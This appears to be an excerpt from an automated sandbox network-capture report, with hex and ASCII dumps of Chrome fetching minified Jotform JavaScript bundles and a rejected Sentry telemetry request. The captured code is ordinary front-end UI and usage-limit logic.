                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 63 68 46 6c 79 69 6e 56 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 71 65 7d 2c 59 32 30 32 34 4d 69 63 72 6f 73 6f 66 74 74 65 61 6d 73 46 6c 79 69 6e 56 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 65 7d 2c 59 32 30 32 34 53 61 6c 65 73 66 6f 72 63 65 46 6c 79 69 6e 56 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 65 7d 2c 59 32 30 32 34 57 6f 72 6b 66 6c 6f 77 73 42 61 6e 6e 65 72 56 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6a 65 7d 2c 59 32 30 32 34 57 6f 72 6b 66 6c 6f 77 73 42 61 6e 6e 65 72 56 32 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 65 7d 2c 59 32 30 32 34 57 6f 72 6b 66 6c 6f 77 73 46 6c 79 69 6e 56 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                            Data Ascii: chFlyinV1:function(){return qe},Y2024MicrosoftteamsFlyinV1:function(){return Oe},Y2024SalesforceFlyinV1:function(){return Le},Y2024WorkflowsBannerV1:function(){return je},Y2024WorkflowsBannerV2:function(){return Ce},Y2024WorkflowsFlyinV1:function(){return
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 39 33 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 35 35 31 39 31 29 29 29 29 2c 70 3d 28 30 2c 73 2e 6c 61 7a 79 29 28 28 28 29 3d 3e 74 2e 65 28 22 32 31 32 31 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 32 31 39 31 32 29 29 29 29 2c 4d 3d 28 30 2c 73 2e 6c 61 7a 79 29 28 28 28 29 3d 3e 74 2e 65 28 22 35 35 31 30 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 34 35 39 39 34 29 29 29 29 2c 6d 3d 28 30 2c 73 2e 6c 61 7a 79 29 28 28 28 29 3d 3e 74 2e 65 28 22 35 39 38 37 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 36 36 34 37 36 29 29 29 29 2c 50 3d 28 30 2c 73 2e 6c 61 7a 79 29 28 28 28 29 3d 3e 74 2e 65 28 22 33 34 31 32 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 37 34 31 32 39 29 29 29 29 2c 45 3d 28 30 2c 73 2e 6c 61 7a
                                                                                                                                                                                                                                            Data Ascii: 93").then(t.bind(t,55191)))),p=(0,s.lazy)((()=>t.e("2121").then(t.bind(t,21912)))),M=(0,s.lazy)((()=>t.e("5510").then(t.bind(t,45994)))),m=(0,s.lazy)((()=>t.e("5987").then(t.bind(t,66476)))),P=(0,s.lazy)((()=>t.e("3412").then(t.bind(t,74129)))),E=(0,s.laz


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            68192.168.2.174978034.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC476OUTGET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC290INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            69192.168.2.1749781104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC386OUTGET /s/portal/674ac14411e/static/js/6354.52cd18d8.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 83118
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "5d9cc235352bd4d92c0db3a0d6dbcf45"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 279
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6370f967ca8-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC941INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 37 63 37 64 35 35 39 2d 34 32 65 39 2d 35 35 62 34 2d 61 64 63 32 2d 33 38 31 37 65 37
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e7c7d559-42e9-55b4-adc2-3817e7
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 6d 65 6e 74 73 22 2c 5f 3d 22 66 6f 72 6d 5f 63 6f 75 6e 74 22 2c 43 3d 22 61 69 5f 61 67 65 6e 74 73 22 2c 41 3d 22 61 69 5f 63 6f 6e 76 65 72 73 61 74 69 6f 6e 73 22 2c 45 3d 22 73 69 67 6e 65 64 5f 64 6f 63 75 6d 65 6e 74 73 22 2c 66 3d 22 77 6f 72 6b 66 6c 6f 77 5f 72 75 6e 73 22 2c 54 3d 22 73 75 62 6d 69 73 73 69 6f 6e 73 22 2c 4e 3d 22 75 70 6c 6f 61 64 73 22 2c 78 3d 22 76 69 65 77 73 22 2c 4f 3d 7b 5b 67 2e 54 4f 54 41 4c 5f 53 55 42 4d 49 53 53 4f 4e 53 5d 3a 68 2c 5b 67 2e 50 41 59 4d 45 4e 54 53 5d 3a 76 2c 5b 67 2e 46 4f 52 4d 53 5d 3a 5f 2c 5b 67 2e 53 49 47 4e 45 44 5f 44 4f 43 55 4d 45 4e 54 53 5d 3a 45 2c 5b 67 2e 41 49 5f 41 47 45 4e 54 53 5d 3a 43 2c 5b 67 2e 41 49 5f 43 4f 4e 56 45 52 53 41 54 49 4f 4e 53 5d 3a 41 2c 5b 67 2e 57 4f 52
                                                                                                                                                                                                                                            Data Ascii: ments",_="form_count",C="ai_agents",A="ai_conversations",E="signed_documents",f="workflow_runs",T="submissions",N="uploads",x="views",O={[g.TOTAL_SUBMISSONS]:h,[g.PAYMENTS]:v,[g.FORMS]:_,[g.SIGNED_DOCUMENTS]:E,[g.AI_AGENTS]:C,[g.AI_CONVERSATIONS]:A,[g.WOR
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 33 20 70 79 2d 32 20 62 6f 72 64 65 72 2d 62 6c 75 65 2d 36 30 30 20 62 67 2d 62 6c 75 65 2d 35 30 30 20 63 6f 6c 6f 72 2d 77 68 69 74 65 22 3a 22 70 72 69 6d 61 72 79 22 3d 3d 3d 6e 2c 22 70 78 2d 33 20 70 79 2d 32 20 62 6f 72 64 65 72 2d 62 20 62 6f 72 64 65 72 2d 6e 61 76 79 2d 32 35 20 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 77 2d 66 75 6c 6c 20 68 6f 76 65 72 3a 62 67 2d 6e 61 76 79 2d 32 35 22 3a 22 64 72 6f 70 64 6f 77 6e 22 3d 3d 3d 6e 7d 2c 69 29 3b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 22 62 75 74 74 6f 6e 22 2c 7b 6f 6e 43 6c 69 63 6b 3a 74 2c 74 79 70 65 3a 22 62 75 74 74 6f 6e 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 6f 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 7d 3b 47 2e 70 72 6f 70 54 79 70 65 73 3d 7b 63 68 69 6c 64 72 65 6e 3a 72 28
                                                                                                                                                                                                                                            Data Ascii: 3 py-2 border-blue-600 bg-blue-500 color-white":"primary"===n,"px-3 py-2 border-b border-navy-25 justify-start w-full hover:bg-navy-25":"dropdown"===n},i);return(0,s.jsx)("button",{onClick:t,type:"button",className:o,children:e})};G.propTypes={children:r(
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 6f 6e 22 7d 7d 29 7d 2c 58 3d 28 7b 70 6c 61 6e 54 79 70 65 3a 65 2c 63 61 6d 70 61 69 67 6e 3a 74 2c 61 73 73 65 74 54 79 70 65 3a 6e 7d 29 3d 3e 60 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 69 6d 69 74 2d 61 73 73 65 74 73 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 62 61 6e 6e 65 72 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 24 7b 65 7d 2d 24 7b 6e 7d 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 24 7b 74 7d 60 2c 51 3d 65 3d 3e 28 28 6e 75 6c 6c 3d 3d 5a 3f 76 6f 69 64 20 30 3a 5a 5b 65 5d 29 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 65 65 3d 28 7b 75 73 65 72 3a 65 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 75 73 65 72 6e 61 6d 65 3a 74 3d 22 22 2c 61 63 63 6f 75 6e 74 5f 74 79 70 65 3a 7b 6e 61 6d 65 3a 6e 3d 22 22 7d 2c 6c 69 6d 69 74 45 73 74 69 6d 61 74 69
                                                                                                                                                                                                                                            Data Ascii: on"}})},X=({planType:e,campaign:t,assetType:n})=>`?utm_source=limit-assets&utm_medium=banner&utm_content=${e}-${n}&utm_campaign=${t}`,Q=e=>((null==Z?void 0:Z[e])||"").toLowerCase(),ee=({user:e})=>{const{username:t="",account_type:{name:n=""},limitEstimati
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 7d 29 7d 29 2c 5b 5d 29 3b 63 6f 6e 73 74 20 63 3d 48 28 29 28 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 33 20 70 78 2d 35 20 70 79 2d 33 20 72 61 64 69 75 73 22 2c 7b 22 61 6c 6d 6f 73 74 46 75 6c 6c 2d 62 6f 78 22 3a 22 61 6c 6d 6f 73 74 46 75 6c 6c 22 3d 3d 3d 74 2c 22 6f 76 65 72 71 75 6f 74 61 2d 62 6f 78 22 3a 22 6f 76 65 72 71 75 6f 74 61 22 3d 3d 3d 74 7d 29 2c 64 3d 48 28 29 28 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 72 61 64 69 75 73 20 74 65 78 74 2d 73 6d 20 7a 2d 31 20 66 6f 6e 74 2d 62 6f 6c 64 20 77 2d 33 36 20 6d 79 2d 30 20 6d 78 2d 61 75 74 6f 20 70 79 2d 32 22 2c 7b 22 61 6c 6d 6f 73 74 46 75 6c 6c 2d 75 70 67 72 61 64 65
                                                                                                                                                                                                                                            Data Ascii: })}),[]);const c=H()("flex flex-col items-center gap-3 px-5 py-3 radius",{"almostFull-box":"almostFull"===t,"overquota-box":"overquota"===t}),d=H()("flex justify-center items-center radius text-sm z-1 font-bold w-36 my-0 mx-auto py-2",{"almostFull-upgrade
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 69 29 26 26 28 65 5b 69 5d 3d 6e 5b 69 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 6c 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 63 6f 6e 73 74 20 63 65 3d 65 3d 3e 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 6c 65 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 65 29 2c 69 65 7c 7c 28 69 65 3d 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 38 20 33 61 31 20 31 20 30 20
                                                                                                                                                                                                                                            Data Ascii: hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e},le.apply(null,arguments)}const ce=e=>o.createElement("svg",le({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),ie||(ie=o.createElement("path",{fillRule:"evenodd",d:"M8 3a1 1 0
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 70 65 29 29 7d 2c 67 65 3d 65 3d 3e 7b 63 6f 6e 73 74 7b 73 74 61 74 75 73 3a 74 3d 21 31 2c 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3a 6e 3d 22 22 7d 3d 65 3b 72 65 74 75 72 6e 20 74 3f 6e 3a 6e 75 6c 6c 7d 2c 68 65 3d 28 65 2c 74 29 3d 3e 7b 6c 65 74 20 6e 3d 65 2f 74 2a 31 30 30 3b 72 65 74 75 72 6e 20 6e 3e 3d 31 30 30 3f 6e 3d 31 30 30 3a 6e 3e 30 26 26 6e 3c 3d 31 26 26 28 6e 3d 31 29 2c 6e 7d 2c 76 65 3d 65 3d 3e 7b 6c 65 74 20 74 3d 22 22 3b 72 65 74 75 72 6e 20 65 3c 34 30 26 26 28 74 3d 53 29 2c 65 3e 3d 34 30 26 26 65 3c 36 30 26 26 28 74 3d 62 29 2c 65 3e 3d 36 30 26 26 65 3c 38 30 26 26 28 74 3d 79 29 2c 65 3e 3d 38 30 26 26 28 74 3d 55 29 2c 74 7d 2c 5f 65 3d 65 3d 3e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 3e 2d 31 2c 43
                                                                                                                                                                                                                                            Data Ascii: pe))},ge=e=>{const{status:t=!1,utm_campaign:n=""}=e;return t?n:null},he=(e,t)=>{let n=e/t*100;return n>=100?n=100:n>0&&n<=1&&(n=1),n},ve=e=>{let t="";return e<40&&(t=S),e>=40&&e<60&&(t=b),e>=60&&e<80&&(t=y),e>=80&&(t=U),t},_e=e=>"number"==typeof e&&e>-1,C
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 72 6e 20 6e 3d 65 2e 66 69 6c 74 65 72 28 28 65 3d 3e 65 2e 6e 61 6d 65 21 3d 3d 74 2e 6e 61 6d 65 29 29 2c 5b 5b 74 5d 2c 6e 5d 7d 29 28 28 28 65 3d 5b 5d 29 3d 3e 45 65 28 65 29 3f 65 2e 73 6f 72 74 28 28 28 65 2c 74 29 3d 3e 74 2e 70 65 72 63 65 6e 74 61 67 65 2d 65 2e 70 65 72 63 65 6e 74 61 67 65 29 29 3a 65 29 28 28 28 65 3d 5b 5d 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 2e 66 69 6e 64 49 6e 64 65 78 28 28 65 3d 3e 65 2e 6e 61 6d 65 3d 3d 3d 67 2e 57 4f 52 4b 46 4c 4f 57 5f 52 55 4e 53 29 29 3b 69 66 28 2d 31 3d 3d 3d 74 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 6e 3d 65 2e 66 69 6e 64 49 6e 64 65 78 28 28 65 3d 3e 65 2e 6e 61 6d 65 3d 3d 3d 67 2e 53 49 47 4e 45 44 5f 44 4f 43 55 4d 45 4e 54 53 29 29 2c 5b 69 5d 3d 65 2e 73 70 6c 69 63 65 28 74
                                                                                                                                                                                                                                            Data Ascii: rn n=e.filter((e=>e.name!==t.name)),[[t],n]})(((e=[])=>Ee(e)?e.sort(((e,t)=>t.percentage-e.percentage)):e)(((e=[])=>{const t=e.findIndex((e=>e.name===g.WORKFLOW_RUNS));if(-1===t)return e;const n=e.findIndex((e=>e.name===g.SIGNED_DOCUMENTS)),[i]=e.splice(t
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 30 20 30 20 31 20 30 20 31 33 2e 35 34 34 56 33 2e 33 33 34 41 33 2e 33 33 33 20 33 2e 33 33 33 20 30 20 30 20 31 20 33 2e 33 33 33 20 30 68 31 33 2e 33 33 34 41 33 2e 33 33 33 20 33 2e 33 33 33 20 30 20 30 20 31 20 32 30 20 33 2e 33 33 33 76 31 33 2e 33 33 34 41 33 2e 33 33 33 20 33 2e 33 33 33 20 30 20 30 20 31 20 31 36 2e 36 36 37 20 32 30 48 36 2e 34 35 36 61 32 2e 31 35 20 32 2e 31 35 20 30 20 30 20 31 2d 31 2e 39 39 37 2d 31 2e 33 35 32 6c 2d 2e 30 34 31 2d 2e 31 30 33 61 31 2e 38 35 20 31 2e 38 35 20 30 20 30 20 31 2d 2e 30 33 37 2d 31 2e 32 37 6c 2e 30 35 33 2d 2e 31 36 61 31 2e 36 38 36 20 31 2e 36 38 36 20 30 20 30 20 31 20 32 2e 32 32 37 2d 31 2e 30 33 34 6d 2d 33 2e 33 32 37 2d 34 2e 34 31 33 53 33 2e 37 35 20 31 30 20 35 20 39 2e 31 36 37 63
                                                                                                                                                                                                                                            Data Ascii: 0 0 1 0 13.544V3.334A3.333 3.333 0 0 1 3.333 0h13.334A3.333 3.333 0 0 1 20 3.333v13.334A3.333 3.333 0 0 1 16.667 20H6.456a2.15 2.15 0 0 1-1.997-1.352l-.041-.103a1.85 1.85 0 0 1-.037-1.27l.053-.16a1.686 1.686 0 0 1 2.227-1.034m-3.327-4.413S3.75 10 5 9.167c
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 73 29 28 73 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 69 63 6f 6e 2d 77 72 61 70 70 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 62 65 2e 5a 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 69 63 6f 6e 22 2c 73 74 79 6c 65 3a 7b 66 69 6c 6c 3a 22 23 35 39 36 45 44 37 22 7d 7d 29 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 22 68 35 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 74 69 74 6c 65 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 74 29 28 6b 65 2e 50 2e 43 4f 4e 47 52 41 54
                                                                                                                                                                                                                                            Data Ascii: s)(s.Fragment,{children:[(0,s.jsxs)("div",{className:"header-wrapper",children:[(0,s.jsx)("span",{className:"icon-wrapper",children:(0,s.jsx)(be.Z,{className:"icon",style:{fill:"#596ED7"}})}),(0,s.jsx)("h5",{className:"title",children:(0,l.t)(ke.P.CONGRAT


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            70192.168.2.1749782104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC400OUTGET /s/portal/674ac14411e/static/js/PublicAppContainer.038a736a.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC429INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 152960
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "6ec7d849da15c0bf56c2c65d24b78e48"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 279
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6381de85e5f-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC940INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 39 39 39 34 36 61 66 2d 35 64 38 66 2d 35 34 30 38 2d 38 32 61 32 2d 66 35 33 33 33 65
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="799946af-5d8f-5408-82a2-f5333e
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 63 61 6c 63 28 24 7b 28 7b 69 73 4f 72 64 65 72 4e 6f 77 42 75 74 74 6f 6e 56 69 73 69 62 6c 65 3a 65 7d 29 3d 3e 65 3f 22 39 35 70 78 22 3a 22 30 70 78 22 7d 29 3b 0a 20 20 60 7d 3b 0a 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 0a 20 20 2e 6d 6f 62 69 6c 65 43 74 78 4d 65 6e 75 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 31 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 68 65
